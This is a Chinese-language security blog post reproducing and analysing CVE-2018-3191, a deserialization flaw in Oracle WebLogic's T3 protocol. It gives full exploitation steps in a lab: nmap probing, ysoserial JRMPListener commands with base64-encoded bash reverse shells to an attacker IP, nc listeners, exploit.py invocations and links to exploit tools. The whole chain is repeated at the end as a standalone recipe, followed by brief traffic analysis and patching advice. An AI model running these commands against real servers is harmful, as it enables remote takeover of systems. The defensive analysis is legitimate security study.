您当前的位置: 飞鹏网>游戏攻略>【互联网攻防日记】WebLogic防御T3协议漏洞

【互联网攻防日记】WebLogic防御T3协议漏洞

本文由飞鹏网小编发表于2019-09-10 14:58:52

【*飞鹏网不保证所有的技术人员都有高尚的道德水平，但是通过传播普及互联网安全知识让更多的人熟悉并可以运用黑客知识，才能推进社会互联网水平的强制进步。我们的初衷是好的，就是手段有点残忍。通过大量培养泛黑客，尤其是中文黑客，让令人头痛的漏洞问题无所遁形。如果有最强的矛，那么一定会产生最强的盾。】

https://github.com/

从渺小到可见，从可见到不可忽视，从不可忽视到巨大，从巨大到息息相关。这就是中国的科技成长之路。

一、前言

在不久前Oracle官方发布的10月重要补丁更新公告(Oracle Critical Patch Update Advisory - October 2018)中发布了五个基于T3协议的WebLogic远程高危漏洞（CVE-2018-3191、CVE-2018-3197、CVE-2018-3201、CVE-2018-3245、CVE-2018-3252），CVSS 3.0 Base Score均为9.8分，版本涉及：10.3.6.0, 12.1.3.0, 12.2.1.3,本文将针对其中影响较大的CVE-2018-3191进行复现与分析,并在流量端进行追溯。

360截图20190910144503849.jpg

二、概要

Weblogic是目前全球市场上应用最广泛的J2EE工具之一，被称为业界最佳的应用程序服务器，其用于构建J2EE应用程序，支持新功能，可降低运营成本，提高性能，增强可扩展性并支持Oracle Applications产品组合。

官方文档传送门：https://docs.oracle.com/middleware/12213/wls/INTRO/intro.htm#INTRO123。

360截图20190910144518703.jpg

关于T3协议：

说到T3协议就不得不提起JAVA远程方法调用:JAVA RMI(Java Remote Method Invocation),其主要用于实现远程过程调用的Application编程接口。通过RMI可以使计算机上运行的程序调用远程服务器上的对象，其目的是使得远程接口对象的使用尽可能简化。该接口的实现方式之一即为：JRMP(Java远程消息交换协议，Java Remote Message Protocol），也可以使用CORBA兼容的方法实现。详细介绍请参考： https://blog.csdn.net/cdl2008sky/article/details/6844719。

T3协议是用于Weblogic服务器和其他Java Application之间传输信息的协议，是实现上述RMI远程过程调用的专有协议，其允许客户端进行JNDI调用。

360截图20190910144534201.jpg

当Weblogic发起一个T3协议连接的时候，Weblogic会连接每一个Java虚拟机并传输流量，由于通信过程得到了极大的简化，所以使得其在操作系统资源利用上实现的高效以及最大化，同时提高了传输速度。

三、分析与复现

360截图20190910144548975.jpg

3.1 环境说明：

攻击机：

192.168.137.135 （Linux 4.15.0-kali2-amd64 #1 SMP Debian 4.15.11-1kali1 x86_64 GNU/Linux）

靶机：

192.168.137.128 （Linux ubuntu 4.15.0-36-generic #39~16.04.1-Ubuntu SMP x86_64 GNU/Linux）

3.2 Weblogic服务信息的快速检测

首先，需要探测靶机Weblogic服务的相关信息，通过使用Nmap工具进行快速扫描，命令如下：

nmap -Pn -sV 192.168.137.128 -p7001 --script=weblogic-t3-infi.nse

如下图标记所示，靶机的Weblogic开启了T3协议，且属于受CVE-2018-3191影响的版本范围，因此，存在着漏洞风险。

3.3 建立接收被攻击方Weblogic请求的JRMP Listener

在获取靶机的Weblogic版本及T3协议的相关信息后，即可开始进行漏洞复现。这里，我们需要使用到ysoserial工具，该工具可以针对不同的Weblogic产品给出漏洞利用脚本。

下载地址：https://github.com/angelwhu/ysoserial。

ysoserial工具基本使用方法：

java -cp ysoserial-0.0.6-SNAPSHOT-BETA-all.jar ysoserial.exploit.JRMPListener 【port】 CommonsCollections1 '【commands】'

360截图20190910144611673.jpg

此处，我们在终端输入命令：

java -cp ysoserial-master.jar ysoserial.exploit.JRMPListener 2345 CommonsCollections1 'bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEzNy4xMzUvNzg5MCAwPiYx|{base64,-d}|{bash,-i}'

目的是在本地建立一个JRMPListener （批注：Java Remote Method Protocol，Java远程消息交换协议。是特定于Java技术的、用于查找和引用远程对象的协议。这是运行在RMI之下、TCP/IP之上的线路层协议），用于接收被攻击方的Weblogic请求，并执行指定的bash反弹命令。

命令后半段的bash命令进行了base64转码解码的操作，此举是为了避免Runtime.getRuntime().exec() 执行过程中将特殊符号转义，明文为：

bash -i >& /dev/tcp/192.168.138.135/7890 0>&1

下图可以看到，我们成功打开了JRMP listener：

3.4 监听7890端口

nc -lvvp 7890

此举是为了等待靶机反弹bash连接。

3.5 执行Exploit

python exploit.py 192.168.137.128 7001 weblogic-spring-jndi.jar 192.168.137.135 2345

Weblogic发起远程方法调用，即rmi服务

上图可以看到，生成了攻击载荷，且注入成功，此时nc监听的端口会收到反弹的bash，获得root权限。

工具下载地址：

CVE-2018-3191 payload生成工具：

https://github.com/voidfyoo/CVE-2018-3191/releases

Weblogic T3协议发送工具：

https://github.com/Libraggbond/CVE-2018-3191

（注：工具安全性请自行查验）

四、流量侧捕获与分析

如图所示为此次在攻击过程中在流量侧抓取的数据包，其中No.16为带有攻击载荷的流量包：

经过对TCP流的追踪，我们可以在此基础上进行详细分析。

4.1 通过T3协议进行通信

4.2 JtaTransactionManager类

由于此前Oracle官方没有将com.bea.core.repackaged包中的AbstractPlatformTransactionManager类加入到黑名单中，因此导致了Spring JNDI注入的发生。通过我们对CVE-2018-3191 POC的分析，在此类中，其主要是使用了JtaTransactionManager这个类进行Spring JNDI注入，这点我们也可以在流量端有所发现：

4.3 攻击payload

4.4 基于T3专有协议的Java.rmi远程方法调用

综上，通过上述关键特征，我们可以很快提取出waf相关防御规则。

五、防御建议

根据本文上述分析，安全工作人员可很快提取相关防御规则升级至WAF系统，由于攻击者是通过T3协议来完成攻击，所以在T3协议访问控制上应该严加管控，ORACLE在本次10月重要披露中除CVE-2018-3252外均可通过T3协议访问控制策略来进行临时防御。通过Weblogic中base_domain的设置页面的”安全”->”筛选器”来进行配置和防御，具体方法不再赘述，请参考网络资料。

由于本次公开的漏洞涉及到了几个较大的版本号，所以影响还是非常大的，建议受漏洞影响的用户尽快升级或更新补丁来进行防护。鉴于Weblogic在防御反序列化漏洞上通常采用黑名单的方式，黑名单在攻击防御侧存在严重弊端，所以在升级版本或更新补丁的同时建议将JDK版本升级至最新版本。

CVE-2018-3191

CVE-2018-3191 反弹shell 本地ip：172.16.38.1 Weblogic：172.16.38.174:7001

1、本地执行 java -cp ysoserial-master.jar ysoserial.exploit.JRMPListener 2222 CommonsCollections1 'bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xNzIuMTYuMzguMS83Nzc3IDA+JjE=}|{base64,-d}|{bash,-i}'

然后执行 nc -lvv 7777

（1）其中的 bash 命令为避免Runtime.getRuntime().exec() 执行过程中将特殊符号转义，进行了base64转码解码的操作，明文为 bash -i >& /dev/tcp/172.16.38.1/7777 0>&1

（2）此操作在本地监听一个JRMPListener，接收被攻击的weblogic 的请求，并执行指定的bash 反弹命令。

（3） Nc 监听7777等待weblogic 主机反弹bash连接。

2、执行 python exploit.py 172.16.38.247 7001 weblogic-spring-jndi-10.3.6.0.jar 172.16.38.1 2222，利用漏洞使weblogic 访问远程rmi服务，并执行bash反弹命令。

3、 nc监听的端口收到反弹的bash，root权限。

攻击所需工具： ysoserial-master.jar //反序列化利用工具https://jitpack.io/com/github/frohoff/ysoserial/master-SNAPSHOT/ysoserial-master-SNAPSHOT.jar weblogic-spring-jndi-10.3.6.0.jar // CVE-2018-3191 payload生成工具 https://github.com/voidfyoo/CVE-2018-3191/releases exploit.py //weblogic t3协议发送工具，集成CVE-2018-3191 payload